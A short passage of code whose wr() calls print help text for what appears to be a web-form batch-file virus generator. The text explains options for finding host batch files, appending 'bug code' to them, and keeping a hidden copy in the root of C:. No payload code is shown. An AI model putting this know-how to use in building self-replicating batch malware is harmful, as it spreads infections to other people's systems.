  wr("the host completes. Search specifies the directories and order ");
  wr("for seeking batch files (watch out for path!). Find Host tells ");
  wr("it to generate code for seeking out the host batch even if run ");
  wr("from the path (not available on appenders), Use Copy keeps a ");
  wr("copy of the bug code in the root of C: (must be checked for ");
  wr("appenders), Hidden hides the root copy, Echo Blank places an ");
  wr("empty line between the host and any appended code to prevent ");
  wr("errors with batches that have no final return. Send to Window ");
  wr("opens a new browser window for the code to avoid trashing the ");
  wr("form. To copy code to clipboard uncheck it, good for one shot. ");
  wr("Resizing or reloading the for");
}
```